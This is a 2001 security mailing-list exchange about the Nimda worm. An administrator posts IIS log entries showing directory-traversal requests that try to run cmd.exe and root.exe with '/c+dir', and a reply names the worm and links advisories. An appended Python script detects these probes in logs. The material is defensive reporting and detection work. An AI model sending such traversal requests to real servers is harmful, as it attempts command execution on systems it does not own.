From: Arnold, Paul (parnoldCURAGEN.COM)
Date: Wed Sep 19 2001 - 00:28:28 CDT

    It's called NIMDA
    http://www.mcafeeb2b.com/
    Or
    http://slashdot.org/article.pl?sid=01/09/18/151203&mode=nested
    Or
    http://www.newsbytes.com/news/01/170225.html
    Or
    http://www.sarc.com/avcenter/venc/data/w32.nimda.amm.html
    or
    http://www.infoworld.com/cgi-bin/fixup.pl?story=http://www.infoworld.com/articles/hn/xml/01/09/18/010918hnnimdanews.xml&dctag=security

    It's nasty - and quick.

    HTH
    Paul

    -----Original Message-----
    From: John Howie [mailto:JHowieMSN.COM]
    Sent: Tuesday, September 18, 2001 2:33 PM
    To: win2ksecadviceLISTSERV.NTSECURITY.NET
    Subject: New attack pattern

    Folks,

    I have started seeing the following in my IIS logs, starting earlier today.
    I am getting hit constantly from various sources. I advise you to check your
    IIS boxes to see if you, or any of the servers you know, has been
    compromised.

    john...

    2001-09-18 13:21:25 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/root.exe /c+dir 404 -
    2001-09-18 13:21:25 216.210.XXX.XXX - 192.168.1.251 80 GET /MSADC/root.exe /c+dir 404 -
    2001-09-18 13:21:25 216.210.XXX.XXX - 192.168.1.251 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
    2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
    2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
    2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET /msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe /c+dir 500 -
    2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..Á ../winnt/system32/cmd.exe /c+dir 500 -
    2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
    2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET /winnt/system32/cmd.exe /c+dir 404 -
    2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /winnt/system32/cmd.exe /c+dir 404 -
    2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
    2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -

    _____________________________________________________________________
    ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
    ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
    SEND ALL COMMANDS TO: listservlistserv.ntsecurity.net
     
    LEGAL NOTICE - Unless expressly stated otherwise, this message is
    confidential and may be privileged. It is intended for the addressee(s)
    only. Access to this e-mail by anyone else is unauthorized. If you are not
    an addressee, any disclosure or copying of the contents or any action taken
    (or not taken) in reliance on it is unauthorized and may be unlawful. If you
    are not an addressee, please inform the sender immediately.
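Added example, not part of either message: one way to act on the advice to check your IIS boxes is to scan a log for the same requests and group them by source. The field layout is assumed from the entries quoted above; the function names and the sample log are constructed for illustration.

```python
import re
from collections import defaultdict

# One entry in the layout quoted above: date time client - server port method request status -
ENTRY = re.compile(r"(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (\S+?) ?- (\S+) (\d+) (\S+) (.+?) (\d{3}) -")
TARGETS = re.compile(r"/(cmd|root)\.exe$", re.IGNORECASE)   # executables requested in the quoted log
# "..", then an encoded separator (or a non-ASCII character in its place), then ".."
TRAVERSAL = re.compile(r"\.\.(%5c|%2f|[^\x00-\x7f]\s?)\.\.", re.IGNORECASE)

def find_probes(raw_log):
    """Map client IP -> [(timestamp, request, status)] for cmd.exe/root.exe requests."""
    text = " ".join(raw_log.split())            # undo mail-client line wrapping
    hits = defaultdict(list)
    for ts, client, _srv, _port, _method, request, status in ENTRY.findall(text):
        stem = request.rsplit(" ", 1)[0]        # drop the query field ("/c+dir" or "-")
        if TARGETS.search(stem):
            hits[client].append((ts, request, int(status)))
    return dict(hits)

def triage(hits):
    """Per source: probe count, traversal attempts, and requests the server answered 200."""
    return {
        client: {
            "probes": len(rows),
            "traversal": sum(1 for _, req, _ in rows if TRAVERSAL.search(req)),
            "answered_200": [req for _, req, st in rows if st == 200],
        }
        for client, rows in hits.items()
    }

# Constructed sample (documentation-range addresses), including wrapped entries
# and a client address with the "-" glued to it.
SAMPLE = """\
2001-09-18 13:21:25 198.51.100.7- 192.0.2.10 80
GET /scripts/root.exe /c+dir 404 -
2001-09-18 13:21:27 198.51.100.7 - 192.0.2.10 80
GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+dir 500 -
2001-09-18 13:21:28 198.51.100.7 - 192.0.2.10 80 GET
/scripts/..\u00c1 ../winnt/system32/cmd.exe /c+dir 500
-
2001-09-18 13:22:02 203.0.113.9 - 192.0.2.10 80
GET /default.htm - 200 -
2001-09-18 13:22:40 203.0.113.44 - 192.0.2.10 80
GET /scripts/root.exe /c+dir 200 -
"""

if __name__ == "__main__":
    for client, summary in triage(find_probes(SAMPLE)).items():
        print(client, summary)
```

Any request listed under `answered_200` was served rather than rejected, so that server is the one to examine first.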